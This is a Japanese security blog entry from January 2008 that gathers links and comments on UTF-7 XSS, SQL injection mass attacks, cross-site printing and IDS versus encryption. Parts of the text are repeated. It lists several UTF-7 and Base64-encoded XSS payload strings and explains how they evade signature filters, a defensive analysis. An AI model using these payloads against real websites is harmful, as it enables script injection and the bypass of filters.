2008/01/11(金)金曜日ー。(久しぶりだ、文字コードネタw)
[セキュリティ] * UTF-7でXSSを発生させる10の方法 (葉っぱ日記)
現状では、#1〜#5 までが公開されています。 今後追記されていく予定とのこと。(^-^)
によると、A-Za-z0-9'(),-./:? は directly encoded characters ということで、Base64 化せずに そのまま符号化する(may be encoded directly as their ASCII equivalents)(may なのね)とされています。 そのため、通常であれば script や alert() などが そのまま見える状態になっているわけですが、この部分もすべて Base64 化してしまうことが出来るようです。(念のため確認してみましたが、この場合でも、Internet Explorer や Firefox で HTMLタグとして認識可能でした。)
、 * "21decode" by yamagata21
[雑談] * あるwebデザイナーの告白 (アルファルファモザイク)
これは素敵☆ わたしも、こんな返事を返してくれる女の子と出会いたいw[出来事] * SANSら、SQLベースの大規模なウェブ攻撃を解読 (CNET)
昨日の * SANS ISC のブログの件20080110#p03
、日本語の解説記事が出たようです。
[雑談] * 海に浮かぶデータセンター (/.jp)
ご時世らしいですから、データセンタごと盗まれるかもw[セキュリティ] * [セキュリティ編]すべての通信を暗号化してはいけない (ITPro)
経由。 これは一見しただけだと 誤解をまねきかねない記事ですね〜。 ただ、IDS/IPS のために、通信の暗号化をやめるべきだという話ではないですね。 むしろ、
(* まなめはうすさん
経由。)これは笑えたw 将来歴史上の有名人になる予定の方は発言内容にご注意をw
関連: * もし歴史上の有名人がmixiをやっていたら (Moon of Samurai)
[セキュリティ] * Web経由でプリンタを操作する攻撃手法が発見される (Computerworld)
mi1kmanさんのブクマ経由。 うーむ、CROSS 「SITE」 なのかな、これw関連: * CROSS SITE PRINTING - Printer Spamming (Aaron Weaver)
**[pdf]**[雑談] いろいろ。
←続きが気になるw
←知らない〜w
現状では、#1〜#5 までが公開されています。 今後追記されていく予定とのこと。(^-^)
textile#1 : +ADw-script+AD4-alert(document.location)+ADw-/script+AD4-#2 : %2BADw-script+AD4-alert(document.location)%2BADw-/script%2BAD4-#3 : +ACIAPgA8-script+AD4-alert(document.location)+ADw-/script+AD4APAAi-#4 : %2BACIAPgA8-script%2BAD4-alert%28document.location%29%2BADw- %2Fscript%2BAD4APAAi-#5 : +ADw-/title+AD4APA-meta http-equiv+AD0-'content-type' content +AD0-'text/html+ADs-charset+AD0-utf-7'+AD4-ちなみに、こうやって並べて書くと、防御側は 「+ADw-」 「+ACIAPg...-」 「-script...+AD4-」 を mod_security などで叩き落せば安心か〜♪とか勘違いしてしまう人が居そうですが、例えば、「"><」の代わりに「@_@"><」とされただけで「+AEAAXwBAACIAPgA8-」という全く異なる文字列になってしまいます。また、* UTF-7 の規格(RFC 2152)
によると、A-Za-z0-9'(),-./:? は directly encoded characters ということで、Base64 化せずに そのまま符号化する(may be encoded directly as their ASCII equivalents)(may なのね)とされています。 そのため、通常であれば script や alert() などが そのまま見える状態になっているわけですが、この部分もすべて Base64 化してしまうことが出来るようです。(念のため確認してみましたが、この場合でも、Internet Explorer や Firefox で HTMLタグとして認識可能でした。)
textile<script>alert(document.location)</script>⇒+ADwAcwBjAHIAaQBwAHQAPgBhAGwAZQByAHQAKABkAG8AYwB1AG0AZQBuAHQALgBsAG8 AYwBhAHQAaQBvAG4AKQA8AC8AcwBjAHIAaQBwAHQAPg-"><script>alert(document.location)</script>⇒+ACIAPgA8AHMAYwByAGkAcAB0AD4AYQBsAGUAcgB0ACgAZABvAGMAdQBtAGUAbgB0AC4 AbABvAGMAYQB0AGkAbwBuACkAPAAvAHMAYwByAGkAcAB0AD4-@_@"><script>alert(document.location)</script>⇒+AEAAXwBAACIAPgA8AHMAYwByAGkAcAB0AD4AYQBsAGUAcgB0ACgAZABvAGMAdQBtAGU AbgB0AC4AbABvAGMAYQB0AGkAbwBuACkAPAAvAHMAYwByAGkAcAB0AD4-防御側は、小手先のシグネーチャより、有効な charset を必ず返すように考えたほうが良いかも。関連: * UTF-7 XSS Cheat Sheet (Yosuke HASEGAWA)
、 * "21decode" by yamagata21
[雑談] * あるwebデザイナーの告白 (アルファルファモザイク)
これは素敵☆ わたしも、こんな返事を返してくれる女の子と出会いたいw[出来事] * SANSら、SQLベースの大規模なウェブ攻撃を解読 (CNET)
昨日の * SANS ISC のブログの件20080110#p03
、日本語の解説記事が出たようです。
textileこの攻撃からウェブサイトを守る方法として、Apacheをプロキシとしてフロントエンドに配置し、ISSやMS-SQLをバックエンドに配置することを示唆している。違う違うw ISS じゃなくて IIS ですよ〜w Proventia でも置くのかと思った。(^-^;関連: * Webサイトに多数被害、SQLインジェクション攻撃が猛威をふるう (ITmedia)
[雑談] * 海に浮かぶデータセンター (/.jp)
- 200トンの鉄橋が一晩で盗まれる
ご時世らしいですから、データセンタごと盗まれるかもw[セキュリティ] * [セキュリティ編]すべての通信を暗号化してはいけない (ITPro)
- ockeghemさんのブクマ
経由。 これは一見しただけだと 誤解をまねきかねない記事ですね〜。 ただ、IDS/IPS のために、通信の暗号化をやめるべきだという話ではないですね。 むしろ、
textile機密性の確保とリアルタイムの攻撃検知をバランスさせるには,通信をすべて暗号化せずに経路上のどこかで平文で通信を監視できる構成にしたほうが効果的だ(図2)。機密性の確保の観点からインターネットを経由する経路では暗号化は必須である。とされていますね。 もちろん、DMZ内でも平文の通信はまかりならん!というポリシーならば、SSL対応の IPS を利用すれば良いぢゃん!ということになりますね。 ちなみに、WAF の場合は、SSL をひもといてチェックした後は、そのまま平文で Webサーバに転送すると思われるので、経路上すべてにおいて暗号化通信が必須!という時には使えないのかも? (Webサーバに転送する前にもう一度暗号化するような製品もありましたっけ?) (・・・重そうだなw)[雑談] * もし歴史上の有名人がtwitterをやっていたら
(* まなめはうすさん
経由。)これは笑えたw 将来歴史上の有名人になる予定の方は発言内容にご注意をw
関連: * もし歴史上の有名人がmixiをやっていたら (Moon of Samurai)
[セキュリティ] * Web経由でプリンタを操作する攻撃手法が発見される (Computerworld)
mi1kmanさんのブクマ経由。 うーむ、CROSS 「SITE」 なのかな、これw関連: * CROSS SITE PRINTING - Printer Spamming (Aaron Weaver)
**[pdf]**[雑談] いろいろ。
- ちょっとした妄想が大変な事になった (ハムスター速報)
←続きが気になるw
- 大人の飲みサークル(!?)「ムジン」って知ってる? (ExciteBit)
←知らない〜w